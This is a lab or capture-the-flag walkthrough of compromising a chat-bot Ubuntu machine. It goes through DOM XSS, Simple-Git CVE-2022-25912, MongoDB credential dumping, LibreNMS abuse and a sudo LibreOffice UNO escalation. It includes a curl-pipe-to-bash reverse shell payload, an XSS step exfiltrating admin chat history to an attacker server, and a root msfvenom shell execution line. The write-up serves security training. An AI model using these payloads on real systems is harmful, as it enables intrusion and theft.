This is an Ubuntu 22.04 machine running a chat bot accessible via web page. The site is vulnerable to DOM-based XSS, which once exploited allows discovery of a hidden subdomain made with Simple-Git 3.14. Turns out this Simple-Git version is vulnerable (CVE-2022-25912) which leads to a first reverse shell in the system, and enumerating contents of the local MongoDB we disclose credentials to move laterally to another user with rights to read the user flag. Regarding privilege escalation, first we need to move laterally to another user by abusing functionalities of a running LibreNMS 22.10.0 server, then check sudo configuration, where a LibreOffice binary, with a vulnerable Apache UNO API, is enabled to be executed as root.
KEYWORDS
DOM-XSS, DOM Invader, Simple-Git 3.14, CVE-2022-25912, MongoDB, LibreNMS 22.10.0, LibreOffice, Apache UNO API, sudo escalation.
Enumerate the web server with Firefox, a login portal comes into view.
Create a new account and log in. In the chatbox, it seems we can issue the command help to see "some buildin commands". Also, it seems we can see a conversation log by typing the command history
In addition to this, there is a "Contact Us" form which apparently puts us in touch with the site administrator.
USER
In the enumeration phase we have found out the history command permits us to see our previous commands, but it would be great if we could see another user's commands (particularly admin commands).
Let's investigate if the chat application and the contact form could be points of entry for DOM-based XSS. This vulnerability arises when an application contains JavaScript code executed client-side in the user browser, and we are able to inject and execute malicious code to manipulate the DOM.
The DOM (Document Object Model) is a hierarchical tree representation of the page HTML elements created by the browser when a web page is loaded. It is useful for developers since they can manipulate web page elements interacting with the DOM with a scripting language such as JavaScript (via developers API and browser console). Here is a good tutorial on the DOM manipulation with JavaScript: https://www.youtube.com/playlist?list=PL4cUxeGkcC9gfoKa5la9dsdCNpuey2s-V
In order to find DOM-based vulnerabilities we will use Burpsuite's DOM Invader. Open Burpsuite's integrated browser and enable the DOM Invader extension, then navigate to the chat application and open the developer options (F12). In the DOM Invader tab, click on "Inject forms", the tool will automatically inject the canary in any web page form. Finally, click on "Submit", DOM Invader will automatically check if the source hits any sink function.
In this case, DOM invader reports the sink function innerHTML. Click on the stack trace link to find the function location.
Inspecting the code, it seems we have found the chat application source code, which is vulnerable to DOM-based XSS.
There you can see the sink function innerHTML previously reported by DOM Invader. Basically, this JavaScript application takes the user message and, if not empty, send it to the server (socket.emit).
Once a DOM-XSS vulnerability has been confirmed, we have to elaborate ways of exploiting it. Let's recapitulate what we have so far:
In the chat.js code we have seen how to send messages to the server.
We know this application is vulnerable to DOM-XSS, meaning we can manipulate the DOM and therefore the page code.
Also, the "Contact Us" can be used to send messages which will be read by the admin.
Let's prepare and send an script in the "Contact Us" form which, once read by the admin, will dump the admin's history, and send it to a web server controlled by us. Since we have already disclosed the chat.js code used to send messages to the server, we will just copy paste the lines we need.
Start a Python HTTP server, then minify the script, base64-encode and send it with Repeater using the atob() JavaScript function (remember to add escape characters before the " character).
The admin's chat history is received on your HTTP server.
Back to Firefox, enter the PoC payload ext::sh -c curl% http://10.10.xxx.xxx|bash in the "Enter Remote Git URL" text box.
A reverse shell for user www-data is received on port 1919.
Move to directory /var/www/app/configuration and enumerate the file connect_db.js
> cat connect_db.jsimportmongoosefrom"mongoose";constconnectDB=async(URL_DATABASE)=>{try{constDB_OPTIONS={dbName:"testing" }mongoose.connect(URL_DATABASE,DB_OPTIONS)console.log("Connected Successfully TO Database") }catch(error){console.log(`ErrorConnectingtotheERROR ${error}`); }}
Looks like an script to connect to a Mongo database called testing. Use local client to connect to Mongo service, then switch to testing database and enumerate the collections. Dump the users collection.
Investigating in the support forums (https://community.librenms.org), they say you can run commands from the /opt/librenms directory. For example you can enumerate the version with validate.php
> ./validate.php===========================================Component|Version---------|-------LibreNMS|22.10.0 (2022-10-18T04:47:05+00:00)DBSchema|2022_09_03_091314_update_ports_adsl_table_with_defaults (246)PHP|8.1.2-1ubuntu2.14Python|3.10.12Database|MariaDB10.6.16-MariaDB-0ubuntu0.22.04.1RRDTool|1.7.2SNMP|5.9.1===========================================[OK] Installed from package; noComposerrequired[FAIL] 'install_dir' config setting is not set correctly. [FIX] It should probably be set to: /opt/librenms
So the version running is 22.10.0. Back in GitHub, download a copy of the source code package version 22.10.0 and inspect the source code. There are two PHP files that catch the attention: adduser.php and config_to_json.php
Disclose the configuration data by executing /opt/librenms/config_to_json.php
This /usr/bin/soffice LibreOffice binary launches the Calc application (the LibreOffice spreadsheet program, similar to Excel).
The flag --accept="socket,host=localhost,port=2002;urp;" enables a socket for remote communication with LibreOffice, listening on localhost (the same machine) on port 2002 using URP (UNO remote protocol).
The flag --headless runs LibreOffice in "headless" mode, meaning it operates without a graphical user interface (GUI).
In summary, the command launches LibreOffice's Calc application and sets up a socket connection on port 2002 for batch processing, automation, or scripting tasks.
The exploit needs to be modified in the last line, just add the executable you want to be run as root. In out case, it will be an msfvenom elf shell which we would have previously transferred to the host in path /var/tmp/shell
shell_execute.execute("/var/tmp/shell","",1)
Then transfer the exploit.py to the host and execute the office.sh shell script with sudo to initiate the LibreOffice server.
